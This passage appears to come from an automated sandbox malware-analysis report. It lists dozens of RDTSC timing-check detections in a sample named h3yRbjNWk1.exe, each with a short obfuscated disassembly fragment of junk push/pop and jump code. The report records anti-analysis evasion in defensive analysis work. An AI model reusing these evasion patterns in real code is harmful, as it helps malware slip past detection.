0x00000054 pop edi 0x00000055 ret 0x00000056 sbb bx, 021Ch 0x0000005b cmc 0x0000005c xchg eax, esi 0x0000005d push edx 0x0000005e js 00007F97B4F2EDDEh 0x00000064 jmp 00007F97B4F2EDD8h 0x00000069 pop edx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E6F97 second address: 9E6F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7E49 second address: 9E7E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E6F9D second address: 9E6FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7E4D second address: 9E7E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8D71 second address: 9E8D92 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4EC49C7h 0x00000008 jmp 00007F97B4EC49C1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8D92 second address: 9E8D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8073 second address: 9E8077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8D96 second address: 9E8D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EA033 second address: 9EA041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EA041 second address: 9EA04B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0EC second address: 9EB0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0F0 second address: 9EB0F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0F6 second address: 9EB0FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0FC second address: 9EB125 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007F97B4F2EDCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4F2EDD1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB125 second address: 9EB1C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 je 00007F97B4EC49B9h 0x0000000e movzx edi, cx 0x00000011 mov dword ptr [ebp+122D2B35h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jp 00007F97B4EC49BBh 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D1C2Fh], ecx 0x00000032 jp 00007F97B4EC49BCh 0x00000038 popad 0x00000039 sub bx, 0184h 0x0000003e mov eax, dword ptr [ebp+122D1321h] 0x00000044 cld 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F97B4EC49B8h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000016h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 or edi, 4F229772h 0x00000067 nop 0x00000068 jmp 00007F97B4EC49BCh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 jmp 00007F97B4EC49C9h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1C7 second address: 9EB1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1CC second address: 9EB1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1D2 second address: 9EB1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1D6 second address: 9EB1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECE54 second address: 9ECE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECE72 second address: 9ECE76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECE76 second address: 9ECEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F97B4F2EDC8h 0x0000000c popad 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1D51h], ebx 0x00000014 push 00000000h 0x00000016 stc 0x00000017 push 00000000h 0x00000019 sub ebx, 13A32A90h 0x0000001f xchg eax, esi 0x00000020 jmp 00007F97B4F2EDD0h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007F97B4F2EDC8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECEB3 second address: 9ECEB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F0C45 second address: 9F0CA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F97B4F2EDCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D265Ah], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F97B4F2EDC8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push eax 0x00000030 pushad 0x00000031 mov dword ptr [ebp+12453AEDh], edi 0x00000037 mov dword ptr [ebp+122D1B8Eh], edx 0x0000003d popad 0x0000003e pop ebx 0x0000003f push 00000000h 0x00000041 jbe 00007F97B4F2EDCCh 0x00000047 add edi, dword ptr [ebp+1247AF6Ah] 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F0CA5 second address: 9F0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EEE96 second address: 9EEEB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F97B4F2EDCEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EEF60 second address: 9EEF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC0EF second address: 9EC0F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC0F5 second address: 9EC115 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F97B4EC49C1h 0x00000008 jmp 00007F97B4EC49BBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jnc 00007F97B4EC49B6h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC115 second address: 9EC18C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F97B4F2EDC6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor edi, 6F023801h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a call 00007F97B4F2EDCCh 0x0000001f pop edi 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 jmp 00007F97B4F2EDCFh 0x0000002c mov eax, dword ptr [ebp+122D0011h] 0x00000032 movsx ebx, bx 0x00000035 movzx edi, si 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F97B4F2EDC8h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a pop edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EFDD8 second address: 9EFDDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F1C07 second address: 9F1C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 je 00007F97B4F2EDC9h 0x0000000b mov bx, dx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F97B4F2EDC8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov di, si 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F97B4F2EDC8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1B22h], eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F97B4F2EDCCh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F1C71 second address: 9F1C77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F1C77 second address: 9F1C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC18C second address: 9EC1A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F97B4EC49BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F2E22 second address: 9F2E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F9449 second address: 9F944F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F944F second address: 9F9458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F9458 second address: 9F945E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD72A second address: 9FD757 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F97B4F2EDD4h 0x00000008 jmp 00007F97B4F2EDCEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jnp 00007F97B4F2EDC8h 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F97B4F2EDC6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD757 second address: 9FD79B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jc 00007F97B4EC49CFh 0x00000010 jmp 00007F97B4EC49C9h 0x00000015 pushad 0x00000016 jmp 00007F97B4EC49C8h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD79B second address: 9FD7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD7AA second address: 9FD7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD7AE second address: 9FD7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F97B4F2EDCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0429D second address: A042CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F97B4EC49C4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A042CC second address: A042F0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4F2EDD6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A042F0 second address: A042F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A042F9 second address: A042FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A03A3D second address: A03A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A04154 second address: A04159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A07990 second address: A079AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49C5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A079AC second address: A079C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4F2EDD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A079C9 second address: A079E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F97B4EC49C1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0ABD8 second address: A0AC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F97B4F2EDD9h 0x0000000e pushad 0x0000000f jmp 00007F97B4F2EDD7h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0DC97 second address: A0DCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0DCB4 second address: A0DCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F97B4F2EDE0h 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0DCE2 second address: A0DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DF5DB second address: 9DF5ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DFC14 second address: 9DFC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DFD6B second address: 9DFD82 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F97B4F2EDC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F97B4F2EDC8h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DFE8D second address: 9DFEB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F97B4EC49BEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F97B4EC49BCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E00D3 second address: 9E0155 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4F2EDC8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F97B4F2EDC8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F97B4F2EDC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 add dword ptr [ebp+122D1D6Eh], edx 0x0000004b jmp 00007F97B4F2EDCFh 0x00000050 mov edi, edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jno 00007F97B4F2EDC6h 0x0000005c jc 00007F97B4F2EDC6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E0155 second address: 9E015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E07AD second address: 9E07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E07B1 second address: 9E07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F97B4EC49BDh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E07E3 second address: 9E0813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD9h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jl 00007F97B4F2EDC8h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E0813 second address: 9E0817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E281 second address: A0E2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c jns 00007F97B4F2EDE8h 0x00000012 jnp 00007F97B4F2EDCEh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E2AE second address: A0E2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E2B2 second address: A0E2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E400 second address: A0E41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F97B4EC49C4h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E556 second address: A0E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F97B4F2EDCFh 0x0000000e jne 00007F97B4F2EDC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E574 second address: A0E587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E587 second address: A0E5A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
